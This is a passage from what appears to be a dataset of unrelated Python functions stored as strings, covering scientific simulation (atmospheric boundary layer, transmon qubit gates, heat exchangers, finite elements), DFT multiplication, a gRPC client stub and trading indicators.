result=pd.DataFrame.from_records(output,columns=['theta','h','qv'])\n\n # save time/computation by only doing calculations for the last timestep (equilibrium)\n result['time']=tspan[-1]/3600./24. #days\n result['deltheta'] = theta_ft(result['h'].values[-1],ft_intercept,ft_gamma) - result['theta'].iloc[-1]\n result['delqv'] = ft_qv - result['qv'].iloc[-1]\n result['LCL'] = calc_lcl(result.iloc[-1], psfc)\n result['q_flux_0']=calc_sfc_qvap_flux(result.iloc[-1],the_tup)\n result['T_flux_0']=calc_sfc_theta_flux(result.iloc[-1],the_tup)\n result['entflux_theta']=calc_entflux_theta(result.iloc[-1],the_tup)\n \n # decide how to calculate entrainment\n the_vars = [result['theta'].iloc[-1],result['h'].iloc[-1],result['qv'].iloc[-1]]\n if use_NT:\n result['went']=calc_went_NT(the_vars, the_tup, result['deltheta'].iloc[-1], \n result['T_flux_0'].iloc[-1], result['q_flux_0'].iloc[-1])\n else:\n result['went']=calc_went(result.iloc[-1],the_tup)\n\n result['entflux_qv']=calc_entflux_qv(result.iloc[-1],the_tup)\n\n with open('dumpmodel.csv','w') as f:\n result.to_csv(f,index=False)\n \n return None", "def __init__(self, *args):\n _ITKCostFunctionsPython.itkSingleValuedVnlCostFunctionAdaptor_swiginit(self,_ITKCostFunctionsPython.new_itkSingleValuedVnlCostFunctionAdaptor(*args))", "def DFTmultiply(x, y, DFTfn, IDFTfn, stringsReversed=False):\n \n # 1. 
Convert decimal strings to lists of digits, pad with zeros so that length\n # is a power of 2\n N_1 = len(x)\n N_2 = len(y)\n p = math.log(N_1 + N_2, 2)\n N = 2**math.ceil(p)\n \n if stringsReversed:\n x_seq = [int(d) for d in x] + [0]*(N - N_1) \n y_seq = [int(d) for d in y] + [0]*(N - N_2)\n else:\n x_seq = [int(d) for d in x[::-1]] + [0]*(N - N_1) \n y_seq = [int(d) for d in y[::-1]] + [0]*(N - N_2)\n \n # 2. Compute DFT of sequences and multiply them elementwise\n X = DFTfn([Complex(d, 0) for d in x_seq])\n Y = DFTfn([Complex(d, 0) for d in y_seq])\n C = [a*b for a,b in zip(X,Y)]\n \n # 3. Compute inverse DFT to get coefficients of product polynomial\n c = IDFTfn(C)\n c_seq = [round(s.re) for s in c]\n \n # 4. Do carry operation and return cleaned decimal string\n carry = 0\n c_seq_carry = []\n for digit in c_seq:\n s = digit + carry\n new_digit, carry = s % 10, s//10\n c_seq_carry.append(new_digit)\n \n r = ''.join([str(d) for d in c_seq_carry])\n r = r.rstrip('0')[::-1]\n return r", "def calc_qcorr(self) -> Dict[int, float]:\n return self._calc_qcorr", "def simulate_quantities_of_interest_superoperator(tlist, c_ops, noise_parameters_CZ, fluxlutman,\n fluxbias_q1, amp,\n sim_step,\n verbose: bool=True):\n\n H_0=calc_hamiltonian(0,fluxlutman,noise_parameters_CZ) # computed at 0 amplitude\n # NOTE: parameters of H_0 could be not exactly e.g. the bare frequencies\n\n # We change the basis from the standard basis to the basis of eigenvectors of H_0\n # The columns of S are the eigenvectors of H_0, appropriately ordered\n if noise_parameters_CZ.dressed_compsub():\n S = qtp.Qobj(matrix_change_of_variables(H_0),dims=[[3, 3], [3, 3]])\n else:\n S = qtp.tensor(qtp.qeye(3),qtp.qeye(3)) # line here to quickly switch off the use of S\n H_0_diag = S.dag()*H_0*S\n\n #w_q0 = fluxlutman.q_freq_01()\n w_q0 = (H_0_diag[1,1]-H_0_diag[0,0]) / (2*np.pi)\n #w_q1 = fluxlutman.q_freq_10()\n w_q1 = (H_0_diag[3,3]-H_0_diag[0,0]) / (2*np.pi)\n\n # H_rotateaway = coupled_transmons_hamiltonian_new(w_q0=w_q0, w_q1=w_q1, \n # alpha_q0=-2*w_q0, alpha_q1=-2*w_q1, J=0)\n\n w_q1_sweetspot = noise_parameters_CZ.w_q1_sweetspot()\n # Correction up to second order of the frequency due to flux noise, computed from w_q0(phi) = w_q0^sweetspot * sqrt(cos(pi * phi/phi_0))\n w_q1_biased = w_q1 - np.pi/2 * (w_q1_sweetspot**2/w_q1) * np.sqrt(1 - (w_q1**4/w_q1_sweetspot**4)) * fluxbias_q1 - \\\n - np.pi**2/2 * w_q1_sweetspot * (1+(w_q1**4/w_q1_sweetspot**4)) / (w_q1/w_q1_sweetspot)**3 * fluxbias_q1**2\n # with sigma up to circa 1e-3 \\mu\\Phi_0 the second order is irrelevant\n correction_to_H = coupled_transmons_hamiltonian_new(w_q0=0, w_q1=np.real(w_q1_biased-w_q1), alpha_q0=0, alpha_q1=0, J=0)\n\n\n t0 = time.time()\n\n exp_L_total=1\n for i in range(len(amp)):\n H=calc_hamiltonian(amp[i],fluxlutman,noise_parameters_CZ) + correction_to_H\n H=S.dag()*H*S\n if c_ops != []:\n c_ops_temp=[]\n for c in range(len(c_ops)):\n if isinstance(c_ops[c],list):\n c_ops_temp.append(c_ops[c][0]*c_ops[c][1][i]) # c_ops are already in the H_0 basis\n else:\n c_ops_temp.append(c_ops[c])\n liouville_exp_t=(qtp.liouvillian(H,c_ops_temp)*sim_step).expm()\n else:\n liouville_exp_t=(-1j*H*sim_step).expm()\n exp_L_total=liouville_exp_t*exp_L_total\n\n t1 = time.time()\n #print('\\n alternative propagator',t1-t0)\n\n\n U_final = exp_L_total\n #U_final=rotating_frame_transformation_new(U_final, fluxlutman.cz_length(), H_0_diag)\n\n phases = phases_from_superoperator(U_final) # order is phi_00, phi_01, phi_10, phi_11, phi_02, phi_20, phi_cond\n phi_cond = 
phases[-1]\n L1 = leakage_from_superoperator(U_final)\n population_02_state = calc_population_02_state(U_final)\n L2 = seepage_from_superoperator(U_final)\n avgatefid = pro_avfid_superoperator_phasecorrected(U_final,phases)\n avgatefid_compsubspace = pro_avfid_superoperator_compsubspace_phasecorrected(U_final,L1,phases) # leakage has to be taken into account, see Woods & Gambetta\n #print('avgatefid_compsubspace',avgatefid_compsubspace)\n\n \n \n #H_twoqubits = coupled_transmons_hamiltonian_new(w_q0=w_q0, w_q1=w_q1, \n # alpha_q0=-2*w_q0, alpha_q1=-2*w_q1, J=0)\n #U_final_new = rotating_frame_transformation_new(U_final, fluxlutman.cz_length(), H_twoqubits) ### old method rotating away also the phase of the |2> state\n\n t = tlist[-1]+sim_step\n U_final_new = correct_reference(U=U_final,w_q1=w_q1,w_q0=w_q0,t=t)\n\n ### Script to check that we are correctly removing the single qubit phases in the rotating frame\n # cz_length = fluxlutman.cz_length()\n # U_check = (1j*H_twoqubits*cz_length).expm() * (-1j*H_0_diag*cz_length).expm()\n # phases_check = phases_from_superoperator(U_check)\n # print(phases_check)\n\n \n avgatefid_compsubspace_notphasecorrected = pro_avfid_superoperator_compsubspace(U_final_new,L1)\n # NOTE: a single qubit phase off by 30 degrees costs 5.5% fidelity\n\n ### Script to check that leakage and phi_cond are not affected by the phase correction, as it should be\n # L1_bis = leakage_from_superoperator(U_final_new)\n # phi_cond_bis = phases_from_superoperator(U_final_new)[-1]\n # print('leakage',L1-L1_bis)\n # print('phi_cond',phi_cond-phi_cond_bis)\n\n phases = phases_from_superoperator(U_final_new) # order is phi_00, phi_01, phi_10, phi_11, phi_02, phi_20, phi_cond\n phase_q0 = (phases[1]-phases[0]) % 360\n phase_q1 = (phases[2]-phases[0]) % 360\n\n\n # We now correct only for the phase of qubit left (q1), in the rotating frame\n avgatefid_compsubspace_pc_onlystaticqubit = pro_avfid_superoperator_compsubspace_phasecorrected_onlystaticqubit(U_final_new,L1,phases)\n \n\n return {'phi_cond': phi_cond, 'L1': L1, 'L2': L2, 'avgatefid_pc': avgatefid,\n 'avgatefid_compsubspace_pc': avgatefid_compsubspace, 'phase_q0': phase_q0, 'phase_q1': phase_q1,\n 'avgatefid_compsubspace': avgatefid_compsubspace_notphasecorrected,\n 'avgatefid_compsubspace_pc_onlystaticqubit': avgatefid_compsubspace_pc_onlystaticqubit, 'population_02_state': population_02_state,\n 'U_final_new': U_final_new}", "def make_derivate_fn(self):\n\n def derivative_fn(y, t):\n self.time = t\n self.compartments = self.convert_list_to_compartments(y)\n self.prepare_vars_and_flows()\n flow_vector = self.convert_compartments_to_list(self.flows)\n self.checks()\n return flow_vector\n\n return derivative_fn", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_H2 = self.edp_par['rho_H2'].value\n Z_H2 = self.edp_par['Z_H2'].value\n sigma_H2 = self.edp_par['sigma_H2'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n \n # Make sure Z_H2 > Z_H1. 
If Z_H2 < Z_H1, swap them\n if Z_H1 > Z_H2:\n Z_H1, Z_H2 = Z_H2, Z_H1\n sigma_H1, sigma_H2 = sigma_H2, sigma_H1\n rho_H1, rho_H2 = rho_H2, rho_H1\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H2 + sigma_H2\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG += 2*rho_H2*sigma_H2 * cos(alpha*Z_H2) * exp(-0.5*(alpha*sigma_H2)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def beta_create_Core_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('org.axe.platform.dapi.v0.Core', 'broadcastTransaction'): BroadcastTransactionRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'getBlock'): GetBlockRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'getEstimatedTransactionFee'): GetEstimatedTransactionFeeRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'getStatus'): GetStatusRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'getTransaction'): GetTransactionRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'subscribeToBlockHeadersWithChainLocks'): BlockHeadersWithChainLocksRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'subscribeToTransactionsWithProofs'): TransactionsWithProofsRequest.SerializeToString,\n }\n response_deserializers = {\n ('org.axe.platform.dapi.v0.Core', 'broadcastTransaction'): BroadcastTransactionResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'getBlock'): GetBlockResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'getEstimatedTransactionFee'): GetEstimatedTransactionFeeResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'getStatus'): GetStatusResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'getTransaction'): GetTransactionResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'subscribeToBlockHeadersWithChainLocks'): BlockHeadersWithChainLocksResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'subscribeToTransactionsWithProofs'): TransactionsWithProofsResponse.FromString,\n }\n cardinalities = {\n 'broadcastTransaction': cardinality.Cardinality.UNARY_UNARY,\n 'getBlock': cardinality.Cardinality.UNARY_UNARY,\n 'getEstimatedTransactionFee': cardinality.Cardinality.UNARY_UNARY,\n 'getStatus': cardinality.Cardinality.UNARY_UNARY,\n 'getTransaction': cardinality.Cardinality.UNARY_UNARY,\n 'subscribeToBlockHeadersWithChainLocks': cardinality.Cardinality.UNARY_STREAM,\n 'subscribeToTransactionsWithProofs': cardinality.Cardinality.UNARY_STREAM,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'org.axe.platform.dapi.v0.Core', cardinalities, options=stub_options)", "def WeibullAcq(params, dt, t, q = 0, cov_mkt = None, seed=None, log_alpha = False)->AcquisitionFunction:\n #print(params)\n par_pop = params[0,0]\n par_pop.astype(float)\n par_lambda = params[0,1] \n 
par_lambda.astype(float)\n par_c = params[0,2] \n par_c.astype(float)\n #par_r = params[0,3] \n #par_r.astype(float)\n par_beta_q = params[0,3] \n par_beta_q.astype(float)\n par_beta_mkt = params[0,4] \n par_beta_mkt.astype(float)\n \n if log_alpha:\n par_lambda = np.exp(par_lambda)\n #print(par_pop)\n \n q = np.array(q).astype(int)\n \n if cov_mkt is None:\n cov_mkt = np.ones_like(t)\n cov_mkt.astype(float)\n \n #cov_mkt_hf = np.array([0.018171081,0.036342162,0.054513243,0.072684324,0.090855405,0.109026486,0.127197568,0.145368649,0.16353973,0.181710811,0.199881892,0.218052973,0.236224054,0.254395135,0.272566216,0.290737297,0.308908378,0.327079459,0.345250541,0.363421622,0.381592703,0.399763784,0.417934865,0.436105946,0.627393493,0.81868104,1.009968586,1.201256133,1.39254368,1.583831227,1.775118773,1.96640632,2.157693867,2.348981414,2.54026896,2.731556507,3.645778254,4.56,5.474221746,6.112110873,6.75,7.387889127,8.808944563,10.23,11.65105544,13.13112772,14.6112,16.09127228,14.28563614,12.48,10.67436386,11.17218193,11.67,12.16781807,12.06890904,11.97,11.87109096,11.48764548,11.1042,10.72075452,15.05037726,19.38,23.70962274,20.62981137,17.55,14.47018863]) \n # qrt to assign quartly covariate\n \n idx = np.arange(t.size)\n\n mnth = np.mod(idx,12)+1\n qrt = np.floor_divide((mnth-1), 3)+1\n \n qrt_bool = (qrt<=np.max(q)) * (qrt>=np.min(q))\n idd_q = np.argwhere(qrt_bool)\n idd_nq = np.argwhere(np.logical_not(qrt_bool))\n \n cov_q = np.zeros_like(cov_mkt)\n\n cov_q[idd_q] = np.exp(par_beta_mkt*np.log(cov_mkt[idd_q])+par_beta_q)\n \n cov_q[idd_nq] = np.exp(par_beta_mkt*np.log(cov_mkt[idd_nq]))\n \n noise = 0.0\n \n tstep = float(dt)\n\n if seed is not None:\n rng = np.random.RandomState(seed=seed)\n else:\n rng = np.random.RandomState()\n\n ####################################\n # kinetics\n \n x = t\n\n ####################################\n # simulation from initial point\n \n #print(cov_q)\n b = np.copy(cov_q)\n idx = idx + 1\n \n ### Check indexing (cov is +1)\n for i in range(1,b.size):\n b[i] = b[i-1] + (idx[i]**par_c-idx[i-1]**par_c)*cov_q[i]\n \n \n V = (1.0-par_pop)*(1-np.exp(- par_lambda * b))\n V0 = V[0]\n V[1:]=V[1:]-V[0:(V.size-1)]\n V[0] = V0\n\n return np.array(V).reshape(-1, 1)", "def technical_analysis(df, periods=ta_periods, macd_periods=periods_MACD):\n\n original_join_state = SETTINGS.join\n SETTINGS.join = False\n\n if 'Volume' not in df.columns and cols_in_df(df, ['Vol']) != []:\n df['Volume'] = df['Volume (BTC)'] # some TA functions need a 'Volume' column\n\n if cols_in_df(df, ['Vol']) != []:\n result = pd.concat([compute_function_different_periods(df, periods, ta.ATR),\n compute_function_different_periods(df, periods, pta.BBANDS),\n compute_function_different_periods(df, periods, pta.STO),\n compute_function_different_periods(df, periods, pta.TRIX),\n # Vortex is a FUCKIN SHIT that gives randomly high values. 
Fuck it\n # compute_function_different_periods(df, [period for period in periods if period > 6], pta.Vortex),\n compute_function_different_periods(df, periods, pta.RSI),\n # compute_function_different_periods(df, periods, pta.ACCDIST),\n compute_function_different_periods(df, periods, pta.MFI),\n compute_function_different_periods(df, periods, pta.OBV),\n compute_function_different_periods(df, periods, pta.FORCE),\n # compute_function_different_periods(df, periods, pta.EOM),\n compute_function_different_periods(df, periods, pta.CCI),\n compute_function_different_periods(df, periods, pta.COPP),\n compute_function_different_periods(df, periods, pta.KELCH),\n compute_function_different_periods(df, periods, pta.STDDEV),\n compute_function_different_periods(df, periods, pta.MA),\n compute_function_different_periods(df, periods, ta.MMed),\n compute_function_different_periods(df, periods, pta.EMA),\n # compute_function_different_periods(df, periods, pta.MOM),\n # compute_function_different_periods(df,periods, pta.ROC),\n # compute_function_different_periods(df, ROC, log=True),\n # pta.MACD(df, 10, 30),\n\n compute_MACD_different_periods(df, periods=macd_periods)\n # pta.PPSR(df)\n ], axis=1)\n\n else:\n result = pd.concat([compute_function_different_periods(df, periods, ta.ATR),\n compute_function_different_periods(df, periods, pta.BBANDS),\n compute_function_different_periods(df, periods, pta.STO),\n compute_function_different_periods(df, periods, pta.TRIX),\n compute_function_different_periods(df, periods, pta.RSI),\n compute_function_different_periods(df, periods, pta.CCI),\n compute_function_different_periods(df, periods, pta.COPP),\n compute_function_different_periods(df, periods, pta.KELCH),\n compute_function_different_periods(df, periods, pta.STDDEV),\n compute_function_different_periods(df, periods, pta.MA),\n compute_function_different_periods(df, periods, ta.MMed),\n compute_function_different_periods(df, periods, pta.EMA),\n compute_MACD_different_periods(df, periods=macd_periods)\n ], axis=1)\n\n\n # result = result.fillna(method='pad')\n SETTINGS.join = original_join_state\n return out(SETTINGS, df, result)", "def corr(self):\n pass", "def derivatives(self, increment_filter):\n ######################################################################\n # derivatives fluid and mass balance are static\n k = self.num_nw_fluids * 2 + 2\n\n ######################################################################\n # derivatives for energy balance equation\n for i in range(2):\n self.jacobian[k, i, 0] = (\n self.outl[i].h.val_SI - self.inl[i].h.val_SI)\n self.jacobian[k, i, 2] = -self.inl[i].m.val_SI\n\n self.jacobian[k, 2, 2] = self.inl[0].m.val_SI\n self.jacobian[k, 3, 2] = self.inl[1].m.val_SI\n k += 1\n\n ######################################################################\n # derivatives for specified heat transfer\n if self.Q.is_set:\n self.jacobian[k, 0, 0] = (\n self.outl[0].h.val_SI - self.inl[0].h.val_SI)\n self.jacobian[k, 0, 2] = -self.inl[0].m.val_SI\n self.jacobian[k, 2, 2] = self.inl[0].m.val_SI\n k += 1\n\n ######################################################################\n # derivatives for specified heat transfer coefficient\n if self.kA.is_set:\n f = self.kA_func\n self.jacobian[k, 0, 0] = (\n self.outl[0].h.val_SI - self.inl[0].h.val_SI)\n for i in range(4):\n if not increment_filter[i, 1]:\n self.jacobian[k, i, 1] = self.numeric_deriv(f, 'p', i)\n if not increment_filter[i, 2]:\n self.jacobian[k, i, 2] = self.numeric_deriv(f, 'h', i)\n k += 1\n\n 
######################################################################\n # derivatives for specified heat transfer coefficient\n if self.kA_char.is_set:\n f = self.kA_char_func\n if not increment_filter[0, 0]:\n self.jacobian[k, 0, 0] = self.numeric_deriv(f, 'm', 0)\n if not increment_filter[1, 0]:\n self.jacobian[k, 1, 0] = self.numeric_deriv(f, 'm', 1)\n for i in range(4):\n if not increment_filter[i, 1]:\n self.jacobian[k, i, 1] = self.numeric_deriv(f, 'p', i)\n if not increment_filter[i, 2]:\n self.jacobian[k, i, 2] = self.numeric_deriv(f, 'h', i)\n k += 1\n\n ######################################################################\n # derivatives for specified upper terminal temperature difference\n if self.ttd_u.is_set:\n f = self.ttd_u_func\n for i in [0, 3]:\n if not increment_filter[i, 1]:\n self.jacobian[k, i, 1] = self.numeric_deriv(f, 'p', i)\n if not increment_filter[i, 2]:\n self.jacobian[k, i, 2] = self.numeric_deriv(f, 'h', i)\n k += 1\n\n ######################################################################\n # derivatives for specified lower terminal temperature difference\n if self.ttd_l.is_set:\n f = self.ttd_l_func\n for i in [1, 2]:\n if not increment_filter[i, 1]:\n self.jacobian[k, i, 1] = self.numeric_deriv(f, 'p', i)\n if not increment_filter[i, 2]:\n self.jacobian[k, i, 2] = self.numeric_deriv(f, 'h', i)\n k += 1\n\n ######################################################################\n # derivatives for specified pressure ratio at hot side\n if self.pr1.is_set:\n self.jacobian[k, 0, 1] = self.pr1.val\n self.jacobian[k, 2, 1] = -1\n k += 1\n\n ######################################################################\n # derivatives for specified pressure ratio at cold side\n if self.pr2.is_set:\n self.jacobian[k, 1, 1] = self.pr2.val\n self.jacobian[k, 3, 1] = -1\n k += 1\n\n ######################################################################\n # derivatives for specified zeta at hot side\n if self.zeta1.is_set:\n f = self.zeta_func\n if not increment_filter[0, 0]:\n self.jacobian[k, 0, 0] = self.numeric_deriv(\n f, 'm', 0, zeta='zeta1', inconn=0, outconn=0)\n if not increment_filter[0, 1]:\n self.jacobian[k, 0, 1] = self.numeric_deriv(\n f, 'p', 0, zeta='zeta1', inconn=0, outconn=0)\n if not increment_filter[0, 2]:\n self.jacobian[k, 0, 2] = self.numeric_deriv(\n f, 'h', 0, zeta='zeta1', inconn=0, outconn=0)\n if not increment_filter[2, 1]:\n self.jacobian[k, 2, 1] = self.numeric_deriv(\n f, 'p', 2, zeta='zeta1', inconn=0, outconn=0)\n if not increment_filter[2, 2]:\n self.jacobian[k, 2, 2] = self.numeric_deriv(\n f, 'h', 2, zeta='zeta1', inconn=0, outconn=0)\n k += 1\n\n ######################################################################\n # derivatives for specified zeta at cold side\n if self.zeta2.is_set:\n f = self.zeta_func\n if not increment_filter[1, 0]:\n self.jacobian[k, 1, 0] = self.numeric_deriv(\n f, 'm', 1, zeta='zeta2', inconn=1, outconn=1)\n if not increment_filter[1, 1]:\n self.jacobian[k, 1, 1] = self.numeric_deriv(\n f, 'p', 1, zeta='zeta2', inconn=1, outconn=1)\n if not increment_filter[1, 2]:\n self.jacobian[k, 1, 2] = self.numeric_deriv(\n f, 'h', 1, zeta='zeta2', inconn=1, outconn=1)\n if not increment_filter[3, 1]:\n self.jacobian[k, 3, 1] = self.numeric_deriv(\n f, 'p', 3, zeta='zeta2', inconn=1, outconn=1)\n if not increment_filter[3, 2]:\n self.jacobian[k, 3, 2] = self.numeric_deriv(\n f, 'h', 3, zeta='zeta2', inconn=1, outconn=1)\n k += 1\n\n ######################################################################\n # derivatives 
for additional equations\n self.additional_derivatives(increment_filter, k)", "def __init__(self,\n uDict,\n phiDict,\n testSpaceDict,\n matType,\n dofBoundaryConditionsDict,\n dofBoundaryConditionsSetterDict,\n coefficients,\n elementQuadrature,\n elementBoundaryQuadrature,\n fluxBoundaryConditionsDict=None,\n advectiveFluxBoundaryConditionsSetterDict=None,\n diffusiveFluxBoundaryConditionsSetterDictDict=None,\n stressTraceBoundaryConditionsSetterDict=None,\n stabilization=None,\n shockCapturing=None,\n conservativeFluxDict=None,\n numericalFluxType=None,\n TimeIntegrationClass=None,\n massLumping=False,\n reactionLumping=False,\n options=None,\n name='defaultName',\n reuse_trial_and_test_quadrature=True,\n sd = True,\n movingDomain=False):\n #\n #set the objects describing the method and boundary conditions\n #\n self.movingDomain=movingDomain\n self.tLast_mesh=None\n #\n self.name=name\n self.sd=sd\n self.Hess=False\n self.lowmem=True\n self.timeTerm=True#allow turning off the time derivative\n #self.lowmem=False\n self.testIsTrial=True\n self.phiTrialIsTrial=True\n self.u = uDict\n self.ua = {}#analytical solutions\n self.phi = phiDict\n self.dphi={}\n for ck,phi in phiDict.iteritems():\n if coefficients.potential.has_key(ck):\n for cj in coefficients.potential[ck].keys():\n self.dphi[(ck,cj)] = FiniteElementFunction(phi.femSpace)\n else:\n self.dphi[(ck,ck)] = FiniteElementFunction(phi.femSpace)\n #check for nonlinearities in the diffusion coefficient that don't match the potential\n for ci,ckDict in coefficients.diffusion.iteritems():\n #for ck,cjDict in coefficients.diffusion.iteritems(): #cek: bug?\n for ck,cjDict in ckDict.iteritems():\n for cj in cjDict.keys():\n if not self.dphi.has_key((ck,cj)):\n self.dphi[(ck,cj)] = FiniteElementFunction(phi.femSpace)\n self.matType = matType\n #try to reuse test and trial information across components if spaces are the same\n self.reuse_test_trial_quadrature = reuse_trial_and_test_quadrature#True#False\n if self.reuse_test_trial_quadrature:\n for ci in range(1,coefficients.nc):\n assert self.u[ci].femSpace.__class__.__name__ == self.u[0].femSpace.__class__.__name__, \"to reuse_test_trial_quad all femSpaces must be the same!\"\n ## Simplicial Mesh\n self.mesh = self.u[0].femSpace.mesh #assume the same mesh for all components for now\n self.testSpace = testSpaceDict\n self.dirichletConditions = dofBoundaryConditionsDict\n self.dirichletNodeSetList=None #explicit Dirichlet conditions for now, no Dirichlet BC constraints\n self.coefficients = coefficients\n self.coefficients.initializeMesh(self.mesh)\n self.nc = self.coefficients.nc\n self.stabilization = stabilization\n self.shockCapturing = shockCapturing\n self.conservativeFlux = conservativeFluxDict #no velocity post-processing for now\n self.fluxBoundaryConditions=fluxBoundaryConditionsDict\n self.advectiveFluxBoundaryConditionsSetterDict=advectiveFluxBoundaryConditionsSetterDict\n self.diffusiveFluxBoundaryConditionsSetterDictDict = diffusiveFluxBoundaryConditionsSetterDictDict\n #determine whether the stabilization term is nonlinear\n self.stabilizationIsNonlinear = False\n #cek come back\n if self.stabilization != None:\n for ci in range(self.nc):\n if coefficients.mass.has_key(ci):\n for flag in coefficients.mass[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n if coefficients.advection.has_key(ci):\n for flag in coefficients.advection[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n if coefficients.diffusion.has_key(ci):\n for 
diffusionDict in coefficients.diffusion[ci].values():\n for flag in diffusionDict.values():\n if flag != 'constant':\n self.stabilizationIsNonlinear=True\n if coefficients.potential.has_key(ci):\n for flag in coefficients.potential[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n if coefficients.reaction.has_key(ci):\n for flag in coefficients.reaction[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n if coefficients.hamiltonian.has_key(ci):\n for flag in coefficients.hamiltonian[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n #determine if we need element boundary storage\n self.elementBoundaryIntegrals = {}\n for ci in range(self.nc):\n self.elementBoundaryIntegrals[ci] = ((self.conservativeFlux != None) or\n (numericalFluxType != None) or\n (self.fluxBoundaryConditions[ci] == 'outFlow') or\n (self.fluxBoundaryConditions[ci] == 'mixedFlow') or\n (self.fluxBoundaryConditions[ci] == 'setFlow'))\n #\n #calculate some dimensions\n #\n self.nSpace_global = self.u[0].femSpace.nSpace_global #assume same space dim for all variables\n self.nDOF_trial_element = [u_j.femSpace.max_nDOF_element for u_j in self.u.values()]\n self.nDOF_phi_trial_element = [phi_k.femSpace.max_nDOF_element for phi_k in self.phi.values()]\n self.n_phi_ip_element = [phi_k.femSpace.referenceFiniteElement.interpolationConditions.nQuadraturePoints for phi_k in self.phi.values()]\n self.nDOF_test_element = [femSpace.max_nDOF_element for femSpace in self.testSpace.values()]\n self.nFreeDOF_global = [dc.nFreeDOF_global for dc in self.dirichletConditions.values()]\n self.nVDOF_element = sum(self.nDOF_trial_element)\n self.nFreeVDOF_global = sum(self.nFreeDOF_global)\n #\n NonlinearEquation.__init__(self,self.nFreeVDOF_global)\n #\n #build the quadrature point dictionaries from the input (this\n #is just for convenience so that the input doesn't have to be\n #complete)\n #\n elementQuadratureDict={}\n elemQuadIsDict = isinstance(elementQuadrature,dict)\n if elemQuadIsDict: #set terms manually\n for I in self.coefficients.elementIntegralKeys:\n if elementQuadrature.has_key(I):\n elementQuadratureDict[I] = elementQuadrature[I]\n else:\n elementQuadratureDict[I] = elementQuadrature['default']\n else:\n for I in self.coefficients.elementIntegralKeys:\n elementQuadratureDict[I] = elementQuadrature\n if self.stabilization != None:\n for I in self.coefficients.elementIntegralKeys:\n if elemQuadIsDict:\n if elementQuadrature.has_key(I):\n elementQuadratureDict[('stab',)+I[1:]] = elementQuadrature[I]\n else:\n elementQuadratureDict[('stab',)+I[1:]] = elementQuadrature['default']\n else:\n elementQuadratureDict[('stab',)+I[1:]] = elementQuadrature\n if self.shockCapturing != None:\n for ci in self.shockCapturing.components:\n if elemQuadIsDict:\n if elementQuadrature.has_key(('numDiff',ci,ci)):\n elementQuadratureDict[('numDiff',ci,ci)] = elementQuadrature[('numDiff',ci,ci)]\n else:\n elementQuadratureDict[('numDiff',ci,ci)] = elementQuadrature['default']\n else:\n elementQuadratureDict[('numDiff',ci,ci)] = elementQuadrature\n if massLumping:\n for ci in self.coefficients.mass.keys():\n elementQuadratureDict[('m',ci)] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global,1)\n for I in self.coefficients.elementIntegralKeys:\n elementQuadratureDict[('stab',)+I[1:]] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global,1)\n if reactionLumping:\n for ci in self.coefficients.mass.keys():\n elementQuadratureDict[('r',ci)] = 
Quadrature.SimplexLobattoQuadrature(self.nSpace_global,1)\n for I in self.coefficients.elementIntegralKeys:\n elementQuadratureDict[('stab',)+I[1:]] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global,1)\n elementBoundaryQuadratureDict={}\n if isinstance(elementBoundaryQuadrature,dict): #set terms manually\n for I in self.coefficients.elementBoundaryIntegralKeys:\n if elementBoundaryQuadrature.has_key(I):\n elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature[I]\n else:\n elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature['default']\n else:\n for I in self.coefficients.elementBoundaryIntegralKeys:\n elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature\n #\n # find the union of all element quadrature points and\n # build a quadrature rule for each integral that has a\n # weight at each point in the union\n #mwf include tag telling me which indices are which quadrature rule?\n (self.elementQuadraturePoints,self.elementQuadratureWeights,\n self.elementQuadratureRuleIndeces) = Quadrature.buildUnion(elementQuadratureDict)\n self.nQuadraturePoints_element = self.elementQuadraturePoints.shape[0]\n self.nQuadraturePoints_global = self.nQuadraturePoints_element*self.mesh.nElements_global\n #\n #Repeat the same 